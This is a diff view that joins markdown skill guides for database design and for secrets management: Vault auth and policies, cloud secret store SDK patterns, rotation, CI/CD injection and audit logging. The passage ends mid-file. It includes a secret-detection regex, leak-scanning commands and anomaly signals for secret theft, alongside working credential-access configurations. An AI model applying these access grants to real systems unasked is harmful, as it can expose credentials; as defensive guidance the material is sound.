1. **Expand** — add the new column/table (nullable, with default)
2. **Migrate data** — backfill in batches; dual-write from application
3. **Transition** — application reads from new column; stop writing to old
4. **Contract** — drop old column in a follow-up migration
### Data Backfill Strategies
```sql
-- Batch update to avoid long-running locks
UPDATE users SET email_normalized = LOWER(email)
WHERE id IN (SELECT id FROM users WHERE email_normalized IS NULL LIMIT 5000);
-- Repeat in a loop until 0 rows affected
```
### Rollback Procedures
- Always test the `down.sql` in staging before deploying `up.sql` to production
- Keep rollback window short — if the contract step has run, rollback requires a new forward migration
- For irreversible changes (dropping columns with data), take a logical backup first
---
## Performance Optimization
### Indexing Strategies
| Index Type | Use Case | Example |
|------------|----------|---------|
| **B-tree** (default) | Equality, range, ORDER BY | `CREATE INDEX idx_users_email ON users(email);` |
| **GIN** | Full-text search, JSONB, arrays | `CREATE INDEX idx_docs_body ON docs USING gin(to_tsvector('english', body));` |
| **GiST** | Geometry, range types, nearest-neighbor | `CREATE INDEX idx_locations ON places USING gist(coords);` |
| **Partial** | Subset of rows (reduce size) | `CREATE INDEX idx_active ON users(email) WHERE active = true;` |
| **Covering** | Index-only scans | `CREATE INDEX idx_cov ON orders(customer_id) INCLUDE (total, created_at);` |
### EXPLAIN Plan Reading
```sql
EXPLAIN (ANALYZE, BUFFERS, FORMAT TEXT) SELECT ...;
```
Key signals to watch:
- **Seq Scan** on large tables — missing index
- **Nested Loop** with high row estimates — consider hash/merge join or add index
- **Buffers shared read** much higher than **hit** — working set exceeds memory
### N+1 Query Detection
Symptoms: application issues one query per row (e.g., fetching related records in a loop).
Fixes:
- Use `JOIN` or subquery to fetch in one round-trip
- ORM eager loading (`select_related` / `includes` / `with`)
- DataLoader pattern for GraphQL resolvers
### Connection Pooling
| Tool | Protocol | Best For |
|------|----------|----------|
| **PgBouncer** | PostgreSQL | Transaction/statement pooling, low overhead |
| **ProxySQL** | MySQL | Query routing, read/write splitting |
| **Built-in pool** (HikariCP, SQLAlchemy pool) | Any | Application-level pooling |
**Rule of thumb:** Set pool size to `(2 * CPU cores) + disk spindles`. For cloud SSDs, start with `2 * vCPUs` and tune.
### Read Replicas and Query Routing
- Route all `SELECT` queries to replicas; writes to primary
- Account for replication lag (typically <1s for async, 0 for sync)
- Use `pg_last_wal_replay_lsn()` to detect lag before reading critical data
---
## Multi-Database Decision Matrix
| Criteria | PostgreSQL | MySQL | SQLite | SQL Server |
|----------|-----------|-------|--------|------------|
| **Best for** | Complex queries, JSONB, extensions | Web apps, read-heavy workloads | Embedded, dev/test, edge | Enterprise .NET stacks |
| **JSON support** | Excellent (JSONB + GIN) | Good (JSON type) | Minimal | Good (OPENJSON) |
| **Replication** | Streaming, logical | Group replication, InnoDB cluster | N/A | Always On AG |
| **Licensing** | Open source (PostgreSQL License) | Open source (GPL) / commercial | Public domain | Commercial |
| **Max practical size** | Multi-TB | Multi-TB | ~1 TB (single-writer) | Multi-TB |
**When to choose:**
- **PostgreSQL** — default choice for new projects; best extensibility and standards compliance
- **MySQL** — existing MySQL ecosystem; simple read-heavy web applications
- **SQLite** — mobile apps, CLI tools, unit test databases, IoT/edge
- **SQL Server** — mandated by enterprise policy; deep .NET/Azure integration
### NoSQL Considerations
| Database | Model | Use When |
|----------|-------|----------|
| **MongoDB** | Document | Schema flexibility, rapid prototyping, content management |
| **Redis** | Key-value / cache | Session store, rate limiting, leaderboards, pub/sub |
| **DynamoDB** | Wide-column | Serverless AWS apps, single-digit-ms latency at any scale |
> Use SQL as default. Reach for NoSQL only when the access pattern clearly benefits from it.
---
## Sharding & Replication
### Horizontal vs Vertical Partitioning
- **Vertical partitioning**: Split columns across tables (e.g., separate BLOB columns). Reduces I/O for narrow queries.
- **Horizontal partitioning (sharding)**: Split rows across databases/servers. Required when a single node cannot hold the dataset or handle the throughput.
### Sharding Strategies
| Strategy | How It Works | Pros | Cons |
|----------|-------------|------|------|
| **Hash** | `shard = hash(key) % N` | Even distribution | Resharding is expensive |
| **Range** | Shard by date or ID range | Simple, good for time-series | Hot spots on latest shard |
| **Geographic** | Shard by user region | Data locality, compliance | Cross-region queries are hard |
### Replication Patterns
| Pattern | Consistency | Latency | Use Case |
|---------|------------|---------|----------|
| **Synchronous** | Strong | Higher write latency | Financial transactions |
| **Asynchronous** | Eventual | Low write latency | Read-heavy web apps |
| **Semi-synchronous** | At-least-one replica confirmed | Moderate | Balance of safety and speed |
---
## Cross-References
- **sql-database-assistant** — query writing, optimization, and debugging for day-to-day SQL work
- **database-schema-designer** — ERD modeling, normalization analysis, and schema generation
- **migration-architect** — large-scale migration planning across database engines or major schema overhauls
- **senior-backend** — application-layer patterns (connection pooling, ORM best practices)
- **senior-devops** — infrastructure provisioning for database clusters and replicas
---
## Conclusion
Effective database design requires balancing multiple competing concerns: performance, scalability, maintainability, and business requirements. This skill provides the tools and knowledge to make informed decisions throughout the database lifecycle, from initial schema design through production optimization and evolution.

View File

@@ -76,3 +76,185 @@ python3 scripts/env_auditor.py /path/to/repo --json
2. Keep dev env files local and gitignored.
3. Enforce detection in CI before merge.
4. Re-test application paths immediately after credential rotation.
---
## Cloud Secret Store Integration
Production applications should never read secrets from `.env` files or environment variables baked into container images. Use a dedicated secret store instead.
### Provider Comparison
| Provider | Best For | Key Feature |
|----------|----------|-------------|
| **HashiCorp Vault** | Multi-cloud / hybrid | Dynamic secrets, policy engine, pluggable backends |
| **AWS Secrets Manager** | AWS-native workloads | Native Lambda/ECS/EKS integration, automatic RDS rotation |
| **Azure Key Vault** | Azure-native workloads | Managed HSM, Azure AD RBAC, certificate management |
| **GCP Secret Manager** | GCP-native workloads | IAM-based access, automatic replication, versioning |
### Selection Guidance
- **Single cloud provider** — use the cloud-native secret manager. It integrates tightly with IAM, reduces operational overhead, and costs less than self-hosting.
- **Multi-cloud or hybrid** — use HashiCorp Vault. It provides a uniform API across environments and supports dynamic secret generation (database credentials, cloud IAM keys) that expire automatically.
- **Kubernetes-heavy** — combine External Secrets Operator with any backend above to sync secrets into K8s `Secret` objects without hardcoding.
### Application Access Patterns
1. **SDK/API pull** — application fetches secret at startup or on-demand via provider SDK.
2. **Sidecar injection** — a sidecar container (e.g., Vault Agent) writes secrets to a shared volume or injects them as environment variables.
3. **Init container** — a Kubernetes init container fetches secrets before the main container starts.
4. **CSI driver** — secrets mount as a filesystem volume via the Secrets Store CSI Driver.
> **Cross-reference:** See `engineering/secrets-vault-manager` for production vault infrastructure patterns, HA deployment, and disaster recovery procedures.
---
## Secret Rotation Workflow
Stale secrets are a liability. Rotation ensures that even if a credential leaks, its useful lifetime is bounded.
### Phase 1: Detection
- Track secret creation and expiry dates in your secret store metadata.
- Set alerts at 30, 14, and 7 days before expiry.
- Use `scripts/env_auditor.py` to flag secrets with no recorded rotation date.
### Phase 2: Rotation
1. **Generate** a new credential (API key, database password, certificate).
2. **Deploy** the new credential to all consumers (apps, services, pipelines) in parallel.
3. **Verify** each consumer can authenticate using the new credential.
4. **Revoke** the old credential only after all consumers are confirmed healthy.
5. **Update** metadata with the new rotation timestamp and next rotation date.
### Phase 3: Automation
- **AWS Secrets Manager** — use built-in Lambda-based rotation for RDS, Redshift, and DocumentDB.
- **HashiCorp Vault** — configure dynamic secrets with TTLs; credentials are generated on-demand and auto-expire.
- **Azure Key Vault** — use Event Grid notifications to trigger rotation functions.
- **GCP Secret Manager** — use Pub/Sub notifications tied to Cloud Functions for rotation logic.
### Emergency Rotation Checklist
When a secret is confirmed leaked:
1. **Immediately revoke** the compromised credential at the provider level.
2. Generate and deploy a replacement credential to all consumers.
3. Audit access logs for unauthorized usage during the exposure window.
4. Scan git history, CI logs, and artifact registries for the leaked value.
5. File an incident report documenting scope, timeline, and remediation steps.
6. Review and tighten detection controls to prevent recurrence.
---
## CI/CD Secret Injection
Secrets in CI/CD pipelines require careful handling to avoid exposure in logs, artifacts, or pull request contexts.
### GitHub Actions
- Use **repository secrets** or **environment secrets** via `${{ secrets.SECRET_NAME }}`.
- Prefer **OIDC federation** (`aws-actions/configure-aws-credentials` with `role-to-assume`) over long-lived access keys.
- Environment secrets with required reviewers add approval gates for production deployments.
- GitHub automatically masks secrets in logs, but avoid `echo` or `toJSON()` on secret values.
### GitLab CI
- Store secrets as **CI/CD variables** with the `masked` and `protected` flags enabled.
- Use **HashiCorp Vault integration** (`secrets:vault`) for dynamic secret injection without storing values in GitLab.
- Scope variables to specific environments (`production`, `staging`) to enforce least privilege.
### Universal Patterns
- **Never echo or print** secret values in pipeline output, even for debugging.
- **Use short-lived tokens** (OIDC, STS AssumeRole) instead of static credentials wherever possible.
- **Restrict PR access** — do not expose secrets to pipelines triggered by forks or untrusted branches.
- **Rotate CI secrets** on the same schedule as application secrets; pipeline credentials are attack vectors too.
- **Audit pipeline logs** periodically for accidental secret exposure that masking may have missed.
---
## Pre-Commit Secret Detection
Catching secrets before they reach version control is the most cost-effective defense. Two leading tools cover this space.
### gitleaks
```toml
# .gitleaks.toml — minimal configuration
[extend]
useDefault = true
[[rules]]
id = "custom-internal-token"
description = "Internal service token pattern"
regex = '''INTERNAL_TOKEN_[A-Za-z0-9]{32}'''
secretGroup = 0
```
- Install: `brew install gitleaks` or download from GitHub releases.
- Pre-commit hook: `gitleaks git --pre-commit --staged`
- Baseline scanning: `gitleaks detect --source . --report-path gitleaks-report.json`
- Manage false positives in `.gitleaksignore` (one fingerprint per line).
### detect-secrets
```bash
# Generate baseline
detect-secrets scan --all-files > .secrets.baseline
# Pre-commit hook (via pre-commit framework)
# .pre-commit-config.yaml
repos:
- repo: https://github.com/Yelp/detect-secrets
rev: v1.5.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
```
- Supports **custom plugins** for organization-specific patterns.
- Audit workflow: `detect-secrets audit .secrets.baseline` interactively marks true/false positives.
### False Positive Management
- Maintain `.gitleaksignore` or `.secrets.baseline` in version control so the whole team shares exclusions.
- Review false positive lists during security audits — patterns may mask real leaks over time.
- Prefer tightening regex patterns over broadly ignoring files.
---
## Audit Logging
Knowing who accessed which secret and when is critical for incident investigation and compliance.
### Cloud-Native Audit Trails
| Provider | Service | What It Captures |
|----------|---------|-----------------|
| **AWS** | CloudTrail | Every `GetSecretValue`, `DescribeSecret`, `RotateSecret` API call |
| **Azure** | Activity Log + Diagnostic Logs | Key Vault access events, including caller identity and IP |
| **GCP** | Cloud Audit Logs | Data access logs for Secret Manager with principal and timestamp |
| **Vault** | Audit Backend | Full request/response logging (file, syslog, or socket backend) |
### Alerting Strategy
- Alert on **access from unknown IP ranges** or service accounts outside the expected set.
- Alert on **bulk secret reads** (more than N secrets accessed within a time window).
- Alert on **access outside deployment windows** when no CI/CD pipeline is running.
- Feed audit logs into your SIEM (Splunk, Datadog, Elastic) for correlation with other security events.
- Review audit logs quarterly as part of access recertification.
---
## Cross-References
This skill covers env hygiene and secret detection. For deeper coverage of related domains, see:
| Skill | Path | Relationship |
|-------|------|-------------|
| **Secrets Vault Manager** | `engineering/secrets-vault-manager` | Production vault infrastructure, HA deployment, DR |
| **Senior SecOps** | `engineering/senior-secops` | Security operations perspective, incident response |
| **CI/CD Pipeline Builder** | `engineering/ci-cd-pipeline-builder` | Pipeline architecture, secret injection patterns |
| **Infrastructure as Code** | `engineering/infrastructure-as-code` | Terraform/Pulumi secret backend configuration |
| **Container Orchestration** | `engineering/container-orchestration` | Kubernetes secret mounting, sealed secrets |

View File

@@ -0,0 +1,403 @@
---
name: "secrets-vault-manager"
description: "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns."
---
# Secrets Vault Manager
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Security / Infrastructure / DevOps
---
## Overview
Production secret infrastructure management for teams running HashiCorp Vault, cloud-native secret stores, or hybrid architectures. This skill covers policy authoring, auth method configuration, automated rotation, dynamic secrets, audit logging, and incident response.
**Distinct from env-secrets-manager** which handles local `.env` file hygiene and leak detection. This skill operates at the infrastructure layer — Vault clusters, cloud KMS, certificate authorities, and CI/CD secret injection.
### When to Use
- Standing up a new Vault cluster or migrating to a managed secret store
- Designing auth methods for services, CI runners, and human operators
- Implementing automated credential rotation (database, API keys, certificates)
- Auditing secret access patterns for compliance (SOC 2, ISO 27001, HIPAA)
- Responding to a secret leak that requires mass revocation
- Integrating secrets into Kubernetes workloads or CI/CD pipelines
---
## HashiCorp Vault Patterns
### Architecture Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Deployment mode | HA with Raft storage | No external dependency, built-in leader election |
| Auto-unseal | Cloud KMS (AWS KMS / Azure Key Vault / GCP KMS) | Eliminates manual unseal, enables automated restarts |
| Namespaces | One per environment (dev/staging/prod) | Blast-radius isolation, independent policies |
| Audit devices | File + syslog (dual) | Vault refuses requests if all audit devices fail — dual prevents outages |
### Auth Methods
**AppRole** — Machine-to-machine authentication for services and batch jobs.
```hcl
# Enable AppRole
path "auth/approle/*" {
capabilities = ["create", "read", "update", "delete", "list"]
}
# Application-specific role
vault write auth/approle/role/payment-service \
token_ttl=1h \
token_max_ttl=4h \
secret_id_num_uses=1 \
secret_id_ttl=10m \
token_policies="payment-service-read"
```
**Kubernetes** — Pod-native authentication via service account tokens.
```hcl
vault write auth/kubernetes/role/api-server \
bound_service_account_names=api-server \
bound_service_account_namespaces=production \
policies=api-server-secrets \
ttl=1h
```
**OIDC** — Human operator access via SSO provider (Okta, Azure AD, Google Workspace).
```hcl
vault write auth/oidc/role/engineering \
bound_audiences="vault" \
allowed_redirect_uris="https://vault.example.com/ui/vault/auth/oidc/oidc/callback" \
user_claim="email" \
oidc_scopes="openid,profile,email" \
policies="engineering-read" \
ttl=8h
```
### Secret Engines
| Engine | Use Case | TTL Strategy |
|--------|----------|-------------|
| KV v2 | Static secrets (API keys, config) | Versioned, manual rotation |
| Database | Dynamic DB credentials | 1h default, 24h max |
| PKI | TLS certificates | 90d leaf certs, 5y intermediate CA |
| Transit | Encryption-as-a-service | Key rotation every 90d |
| SSH | Signed SSH certificates | 30m for interactive, 8h for automation |
### Policy Design
Follow least-privilege with path-based granularity:
```hcl
# payment-service-read policy
path "secret/data/production/payment/*" {
capabilities = ["read"]
}
path "database/creds/payment-readonly" {
capabilities = ["read"]
}
# Deny access to admin paths explicitly
path "sys/*" {
capabilities = ["deny"]
}
```
**Policy naming convention:** `{service}-{access-level}` (e.g., `payment-service-read`, `api-gateway-admin`).
---
## Cloud Secret Store Integration
### Comparison Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| Rotation | Built-in Lambda | Custom logic via Functions | Cloud Functions |
| Versioning | Automatic | Manual or automatic | Automatic |
| Encryption | AWS KMS (default or CMK) | HSM-backed | Google-managed or CMEK |
| Access control | IAM policies + resource policy | RBAC + Access Policies | IAM bindings |
| Cross-region | Replication supported | Geo-redundant by default | Replication supported |
| Audit | CloudTrail | Azure Monitor + Diagnostic Logs | Cloud Audit Logs |
| Pricing model | Per-secret + per-API call | Per-operation + per-key | Per-secret version + per-access |
### When to Use Which
- **AWS Secrets Manager**: RDS/Aurora credential rotation out of the box. Best when fully on AWS.
- **Azure Key Vault**: Certificate management strength. Required for Azure AD integrated workloads.
- **GCP Secret Manager**: Simplest API surface. Best for GKE-native workloads with Workload Identity.
- **HashiCorp Vault**: Multi-cloud, dynamic secrets, PKI, transit encryption. Best for complex or hybrid environments.
### SDK Access Patterns
**Principle:** Always fetch secrets at startup or via sidecar — never bake into images or config files.
```python
# AWS Secrets Manager pattern
import boto3, json
def get_secret(secret_name, region="us-east-1"):
client = boto3.client("secretsmanager", region_name=region)
response = client.get_secret_value(SecretId=secret_name)
return json.loads(response["SecretString"])
```
```python
# GCP Secret Manager pattern
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
```
```python
# Azure Key Vault pattern
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name):
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
return client.get_secret(secret_name).value
```
---
## Secret Rotation Workflows
### Rotation Strategy by Secret Type
| Secret Type | Rotation Frequency | Method | Downtime Risk |
|-------------|-------------------|--------|---------------|
| Database passwords | 30 days | Dual-account swap | Zero (A/B rotation) |
| API keys | 90 days | Generate new, deprecate old | Zero (overlap window) |
| TLS certificates | 60 days before expiry | ACME or Vault PKI | Zero (graceful reload) |
| SSH keys | 90 days | Vault-signed certificates | Zero (CA-based) |
| Service tokens | 24 hours | Dynamic generation | Zero (short-lived) |
| Encryption keys | 90 days | Key versioning (rewrap) | Zero (version coexistence) |
### Database Credential Rotation (Dual-Account)
1. Two database accounts exist: `app_user_a` and `app_user_b`
2. Application currently uses `app_user_a`
3. Rotation rotates `app_user_b` password, updates secret store
4. Application switches to `app_user_b` on next credential fetch
5. After grace period, `app_user_a` password is rotated
6. Cycle repeats
### API Key Rotation (Overlap Window)
1. Generate new API key with provider
2. Store new key in secret store as `current`, move old to `previous`
3. Deploy applications — they read `current`
4. After all instances restarted (or TTL expired), revoke `previous`
5. Monitoring confirms zero usage of old key before revocation
---
## Dynamic Secrets
Dynamic secrets are generated on-demand with automatic expiration. Prefer dynamic secrets over static credentials wherever possible.
### Database Dynamic Credentials (Vault)
```hcl
# Configure database engine
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.example.com:5432/app" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="<admin-password>"
# Create role with TTL
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### Cloud IAM Dynamic Credentials
Vault can generate short-lived AWS IAM credentials, Azure service principal passwords, or GCP service account keys — eliminating long-lived cloud credentials entirely.
### SSH Certificate Authority
Replace SSH key distribution with a Vault-signed certificate model:
1. Vault acts as SSH CA
2. Users/machines request signed certificates with short TTL (30 min)
3. SSH servers trust the CA public key — no `authorized_keys` management
4. Certificates expire automatically — no revocation needed for normal operations
---
## Audit Logging
### What to Log
| Event | Priority | Retention |
|-------|----------|-----------|
| Secret read access | HIGH | 1 year minimum |
| Secret creation/update | HIGH | 1 year minimum |
| Auth method login | MEDIUM | 90 days |
| Policy changes | CRITICAL | 2 years (compliance) |
| Failed access attempts | CRITICAL | 1 year |
| Token creation/revocation | MEDIUM | 90 days |
| Seal/unseal operations | CRITICAL | Indefinite |
### Anomaly Detection Signals
- Secret accessed from new IP/CIDR range
- Access volume spike (>3x baseline for a path)
- Off-hours access for human auth methods
- Service accessing secrets outside its policy scope (denied requests)
- Multiple failed auth attempts from single source
- Token created with unusually long TTL
### Compliance Reporting
Generate periodic reports covering:
1. **Access inventory** — Which identities accessed which secrets, when
2. **Rotation compliance** — Secrets overdue for rotation
3. **Policy drift** — Policies modified since last review
4. **Orphaned secrets** — Secrets with no recent access (>90 days)
Use `audit_log_analyzer.py` to parse Vault or cloud audit logs for these signals.
---
## Emergency Procedures
### Secret Leak Response (Immediate)
**Time target: Contain within 15 minutes of detection.**
1. **Identify scope** — Which secret(s) leaked, where (repo, log, error message, third party)
2. **Revoke immediately** — Rotate the compromised credential at the source (provider API, Vault, cloud SM)
3. **Invalidate tokens** — Revoke all Vault tokens that accessed the leaked secret
4. **Audit blast radius** — Query audit logs for usage of the compromised secret in the exposure window
5. **Notify stakeholders** — Security team, affected service owners, compliance (if PII/regulated data)
6. **Post-mortem** — Document root cause, update controls to prevent recurrence
### Vault Seal Operations
**When to seal:** Active security incident affecting Vault infrastructure, suspected key compromise.
**Sealing** stops all Vault operations. Use only as last resort.
**Unseal procedure:**
1. Gather quorum of unseal key holders (Shamir threshold)
2. Or confirm auto-unseal KMS key is accessible
3. Unseal via `vault operator unseal` or restart with auto-unseal
4. Verify audit devices reconnected
5. Check active leases and token validity
See `references/emergency_procedures.md` for complete playbooks.
---
## CI/CD Integration
### Vault Agent Sidecar (Kubernetes)
Vault Agent runs alongside application pods, handles authentication and secret rendering:
```yaml
# Pod annotation for Vault Agent Injector
annotations:
vault.hashicorp.com/agent-inject: "true"
vault.hashicorp.com/role: "api-server"
vault.hashicorp.com/agent-inject-secret-db: "database/creds/app-readonly"
vault.hashicorp.com/agent-inject-template-db: |
{{- with secret "database/creds/app-readonly" -}}
postgresql://{{ .Data.username }}:{{ .Data.password }}@db:5432/app
{{- end }}
```
### External Secrets Operator (Kubernetes)
For teams preferring declarative GitOps over agent sidecars:
```yaml
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: api-credentials
spec:
refreshInterval: 1h
secretStoreRef:
name: vault-backend
kind: ClusterSecretStore
target:
name: api-credentials
data:
- secretKey: api-key
remoteRef:
key: secret/data/production/api
property: key
```
### GitHub Actions OIDC
Eliminate long-lived secrets in CI by using OIDC federation:
```yaml
- name: Authenticate to Vault
uses: hashicorp/vault-action@v2
with:
url: https://vault.example.com
method: jwt
role: github-ci
jwtGithubAudience: https://vault.example.com
secrets: |
secret/data/ci/deploy api_key | DEPLOY_API_KEY ;
secret/data/ci/deploy db_password | DB_PASSWORD
```
---
## Anti-Patterns
| Anti-Pattern | Risk | Correct Approach |
|-------------|------|-----------------|
| Hardcoded secrets in source code | Leak via repo, logs, error output | Fetch from secret store at runtime |
| Long-lived static tokens (>30 days) | Stale credentials, no accountability | Dynamic secrets or short TTL + rotation |
| Shared service accounts | No audit trail per consumer | Per-service identity with unique credentials |
| No rotation policy | Compromised creds persist indefinitely | Automated rotation on schedule |
| Secrets in environment variables on CI | Visible in build logs, process table | Vault Agent or OIDC-based injection |
| Single unseal key holder | Bus factor of 1, recovery blocked | Shamir split (3-of-5) or auto-unseal |
| No audit device configured | Zero visibility into access | Dual audit devices (file + syslog) |
| Wildcard policies (`path "*"`) | Over-permissioned, violates least privilege | Explicit path-based policies per service |
---
## Tools
| Script | Purpose |
|--------|---------|
| `vault_config_generator.py` | Generate Vault policy and auth config from application requirements |
| `rotation_planner.py` | Create rotation schedule from a secret inventory file |
| `audit_log_analyzer.py` | Analyze audit logs for anomalies and compliance gaps |
---
## Cross-References
- **env-secrets-manager** — Local `.env` file hygiene, leak detection, drift awareness
- **senior-secops** — Security operations, incident response, threat modeling
- **ci-cd-pipeline-builder** — Pipeline design where secrets are consumed
- **docker-development** — Container secret injection patterns
- **helm-chart-builder** — Kubernetes secret management in Helm charts

View File

@@ -0,0 +1,354 @@
# Cloud Secret Store Reference
## Provider Comparison
### Feature Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| **Secret types** | String, binary | Secrets, keys, certificates | String, binary |
| **Max secret size** | 64 KB | 25 KB (secret), 200 KB (cert) | 64 KB |
| **Versioning** | Automatic (all versions) | Manual enable per secret | Automatic |
| **Rotation** | Built-in Lambda rotation | Custom via Functions/Logic Apps | Custom via Cloud Functions |
| **Encryption** | AWS KMS (default or CMK) | HSM-backed (FIPS 140-2 L2) | Google-managed or CMEK |
| **Cross-region** | Replication to multiple regions | Geo-redundant by SKU | Replication supported |
| **Access control** | IAM + resource-based policies | RBAC + access policies | IAM bindings |
| **Audit** | CloudTrail | Azure Monitor + Diagnostics | Cloud Audit Logs |
| **Secret references** | ARN | Vault URI + secret name | Resource name |
| **Cost model** | $0.40/secret/mo + $0.05/10K calls | $0.03/10K ops (Standard) | $0.06/10K access ops |
| **Free tier** | No | No | 6 active versions free |
### Decision Guide
**Choose AWS Secrets Manager when:**
- Fully on AWS
- Need native RDS/Aurora/Redshift rotation
- Using ECS/EKS with native AWS IAM integration
- Cross-account secret sharing via resource policies
**Choose Azure Key Vault when:**
- Azure-primary workloads
- Certificate lifecycle management is critical (built-in CA integration)
- Need HSM-backed key protection (Premium SKU)
- Azure AD conditional access integration required
**Choose GCP Secret Manager when:**
- GCP-primary workloads
- Using GKE with Workload Identity
- Want simplest API surface (few concepts, fast to integrate)
- Cost-sensitive (generous free tier)
**Choose HashiCorp Vault when:**
- Multi-cloud or hybrid environments
- Dynamic secrets (database, cloud IAM, SSH) are primary use case
- Need transit encryption, PKI, or SSH CA
- Regulatory requirement for self-hosted secret management
## AWS Secrets Manager
### Access Patterns
```python
import boto3
import json
from botocore.exceptions import ClientError
def get_secret(secret_name, region="us-east-1"):
"""Retrieve secret from AWS Secrets Manager."""
client = boto3.client("secretsmanager", region_name=region)
try:
response = client.get_secret_value(SecretId=secret_name)
except ClientError as e:
code = e.response["Error"]["Code"]
if code == "ResourceNotFoundException":
raise ValueError(f"Secret {secret_name} not found")
elif code == "DecryptionFailureException":
raise RuntimeError("KMS decryption failed — check key permissions")
raise
if "SecretString" in response:
return json.loads(response["SecretString"])
return response["SecretBinary"]
```
### Rotation with Lambda
```python
# rotation_lambda.py — skeleton for custom rotation
def lambda_handler(event, context):
secret_id = event["SecretId"]
step = event["Step"]
token = event["ClientRequestToken"]
client = boto3.client("secretsmanager")
if step == "createSecret":
# Generate new credentials
new_password = generate_password()
client.put_secret_value(
SecretId=secret_id,
ClientRequestToken=token,
SecretString=json.dumps({"password": new_password}),
VersionStages=["AWSPENDING"],
)
elif step == "setSecret":
# Apply new credentials to the target service
pending = get_secret_version(client, secret_id, "AWSPENDING", token)
apply_credentials(pending)
elif step == "testSecret":
# Verify new credentials work
pending = get_secret_version(client, secret_id, "AWSPENDING", token)
test_connection(pending)
elif step == "finishSecret":
# Mark AWSPENDING as AWSCURRENT
client.update_secret_version_stage(
SecretId=secret_id,
VersionStage="AWSCURRENT",
MoveToVersionId=token,
RemoveFromVersionId=get_current_version(client, secret_id),
)
```
### IAM Policy for Secret Access
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["secretsmanager:GetSecretValue"],
"Resource": "arn:aws:secretsmanager:us-east-1:123456789012:secret:production/api/*",
"Condition": {
"StringEquals": {
"aws:RequestedRegion": "us-east-1"
}
}
}
]
}
```
### Cross-Account Access
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::987654321098:role/shared-secret-reader"},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*",
"Condition": {
"ForAnyValue:StringEquals": {
"secretsmanager:VersionStage": "AWSCURRENT"
}
}
}
]
}
```
## Azure Key Vault
### Access Patterns
```python
from azure.identity import DefaultAzureCredential, ManagedIdentityCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name, use_managed_identity=True):
"""Retrieve secret from Azure Key Vault."""
if use_managed_identity:
credential = ManagedIdentityCredential()
else:
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
return client.get_secret(secret_name).value
def list_secrets(vault_url):
"""List all secret names (not values)."""
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
return [s.name for s in client.list_properties_of_secrets()]
```
### RBAC vs Access Policies
**RBAC (recommended):**
- Uses Azure AD roles (`Key Vault Secrets User`, `Key Vault Secrets Officer`)
- Managed at subscription/resource group/vault level
- Audit via Azure AD activity logs
**Access Policies (legacy):**
- Per-vault configuration
- Object ID based
- No inheritance from resource group
```bash
# Assign RBAC role
az role assignment create \
--role "Key Vault Secrets User" \
--assignee <service-principal-id> \
--scope /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault>
```
### Certificate Management
Azure Key Vault has first-class certificate management with automatic renewal:
```bash
# Create certificate with auto-renewal
az keyvault certificate create \
--vault-name my-vault \
--name api-tls \
--policy @cert-policy.json
# cert-policy.json
{
"issuerParameters": {"name": "Self"},
"keyProperties": {"keyType": "RSA", "keySize": 2048},
"lifetimeActions": [
{"action": {"actionType": "AutoRenew"}, "trigger": {"daysBeforeExpiry": 30}}
],
"x509CertificateProperties": {
"subject": "CN=api.example.com",
"validityInMonths": 12
}
}
```
## GCP Secret Manager
### Access Patterns
```python
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
"""Retrieve secret from GCP Secret Manager."""
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
def create_secret(project_id, secret_id, secret_value):
"""Create a new secret with initial version."""
client = secretmanager.SecretManagerServiceClient()
parent = f"projects/{project_id}"
# Create the secret resource
secret = client.create_secret(
request={
"parent": parent,
"secret_id": secret_id,
"secret": {"replication": {"automatic": {}}},
}
)
# Add a version with the secret value
client.add_secret_version(
request={
"parent": secret.name,
"payload": {"data": secret_value.encode("UTF-8")},
}
)
return secret.name
```
### Workload Identity for GKE
Eliminate service account key files by binding Kubernetes service accounts to GCP IAM:
```bash
# Create IAM binding
gcloud iam service-accounts add-iam-policy-binding \
secret-accessor@my-project.iam.gserviceaccount.com \
--role roles/iam.workloadIdentityUser \
--member "serviceAccount:my-project.svc.id.goog[namespace/ksa-name]"
# Annotate Kubernetes service account
kubectl annotate serviceaccount ksa-name \
--namespace namespace \
iam.gke.io/gcp-service-account=secret-accessor@my-project.iam.gserviceaccount.com
```
### IAM Policy
```bash
# Grant secret accessor role to a service account
gcloud secrets add-iam-policy-binding my-secret \
--member="serviceAccount:my-app@my-project.iam.gserviceaccount.com" \
--role="roles/secretmanager.secretAccessor"
```
## Cross-Cloud Patterns
### Abstraction Layer
